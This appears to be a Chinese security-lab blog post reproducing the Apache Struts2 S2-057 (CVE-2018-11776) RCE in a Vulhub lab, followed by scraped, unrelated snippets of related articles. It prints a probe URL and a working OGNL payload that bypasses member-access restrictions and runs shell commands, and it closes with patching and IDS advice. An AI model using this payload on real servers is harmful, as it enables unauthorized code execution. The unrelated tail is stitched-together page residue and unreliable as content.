网安引领时代,弥天点亮未来

0x00漏洞简述

2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776)。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行。同理,url标签未设置value和action值且上层动作未设置或用通配符namespace时也可能导致远程代码执行

0x01影响版本

Apache Struts2.3–Struts 2.3.34, Struts 2.5– Struts 2.5.16

0x02漏洞复现

虚拟机部署docker安装Vulhub一键搭建漏洞测试靶场环境。

docker-compose up -d

1、访问漏洞环境

2、访问/showcase路径到Struts2测试页

http://192.168.60.131:8080/showcase

3、Payload验证漏洞是否存在

http://192.168.60.131:8080/struts2-showcase/$%7B9*9%7D/actionChain1.action

返回结果

4、POC进行漏洞利用

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

在利用时需要进行URL编码

命令执行

0x03修复建议

1、将ApacheStrust2版本升级到官方最新版本

2、Web应用,尽量保证代码的安全性。重点从SDL角度重视安全

3、对于IDS规则,数值计算和弹计算器返回的状态码都是302,并且Location跳转字段含有特征句柄字符串;如果是命令回显返回的200状态码,且有命令结果输出。

0x04参考链接

https://www.anquanke.com/post/id/157823

知识分享完了

喜欢别忘了关注我们哦~

予以风动,必降弥天之润!

弥  天

安全实验室

struts2漏洞_Apache Struts2057远程代码执行漏洞复现相关推荐

  1. thinkphp v5.0.11漏洞_ThinkPHP5丨远程代码执行漏洞动态分析

    ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性.但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏 ...

  2. Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御

    摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程 本文分享自华为云社区<Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御>,作者 ...

  3. 最新系统漏洞--D-LINK DIR-3040远程代码执行漏洞

    最新系统漏洞2021年11月14日 受影响系统: D-Link DIR-3040 1.13B03 描述: D-LINK DIR-3040是中国台湾友讯(D-Link)公司的一个路由器.提供连接网络的功 ...

  4. wordpress php执行短代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)

    1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常 ...

  5. rmi远程代码执行漏洞_【漏洞通告】Apache Solr远程代码执行漏洞

    1.综述 Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器.该产品支持层面搜索.垂直搜索.高亮显示搜索结果等. Apache Solr ...

  6. android fastjson漏洞_【漏洞预警】Fastjson 远程代码执行漏洞(暂无PoC)

    Fastjson简介 Fastjson是一个Java语言编写的高性能功能完善的JSON库.它采用一种"假定有序快速匹配"的算法,把JSON Parse的性能提升到极致,是目前Jav ...

  7. js word 预览_微软补丁日:Word/DHCP/LNK远程代码执行漏洞预警

    漏洞背景 2019年8月14日微软发布的安全更新中除了RDP漏洞还涵盖了针对多个远程代码执行高危漏洞的修复. Microsoft Word远程代码执行漏洞, 漏洞编号CVE-2019-0585. Wi ...

  8. zabbix监控深信服_Zabbix 远程代码执行漏洞CVE202011800

    漏洞概要 漏洞名称:Zabbix 远程代码执行漏洞CVE-2020-11800 威胁等级:高危 影响范围: Zabbix 3.2 (已不支持) Zabbix 3.0 - 3.0.30 Zabbix 2 ...

  9. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

最新文章

  1. Android RecyclerView(和SnapHelper) 实现类似ViewPager的效果
  2. python程序将其重复M个字符N次
  3. c语言三目运算错误,c语言中三目运算符有什么用
  4. 递归-计算字符串长度(代码、分析、汇编)
  5. JavaScript一个简易枚举类型实现扑克牌
  6. 如何在Linux上制作一个屏幕录像视频教程
  7. 三维视觉前沿进展年度报告
  8. Python——元组Tuple
  9. postSQL使用存储过程动态查询
  10. linux卸载+oracle客户端,官方的linux上卸载oracle步骤
  11. tm影像辐射定标_遥感卫星图像辐射定标制作
  12. 2019年注册测绘师 测绘管理与法律法规 精讲班视频课程
  13. 优派 ELITE XG320Q、XG320U / UG 评测
  14. 14.hibernate的入门
  15. Android Studio 中 为模拟器添加图片和图片路径(图文级教程)
  16. 什么是基于web开发,CSS的浮动属性,干货满满!
  17. 【PyCharm中PIL/Pillow的安装】
  18. 靶场环境的搭建(2020年6月15日学习笔记)
  19. MyZ总结seo优化11点
  20. 如何让Java应用成为杀不死的小强?(中篇)

热门文章

  1. 判断一个字符串是否是回文_Python
  2. php把二维数组变为一维,如何将PHP二维数组转换为一维数组
  3. 微服务主见传递ID还是json_后台管理系统之微服务搭建
  4. jmeter和oracle,jmeter测试Oracle数据库
  5. 【NLP】毕设学习笔记(四)bert相关知识点
  6. linux文件被覆盖如何恢复_在Linux下误删文件后恢复
  7. linux dns chroot,chroot DNS 过程(包括一些简单的排错过程)
  8. java nurbs几何库_NURBS曲线与曲面
  9. python db2 linux 安装,python安装DB2模块
  10. 电脑小白用Linux,linux小白说说用linux的感受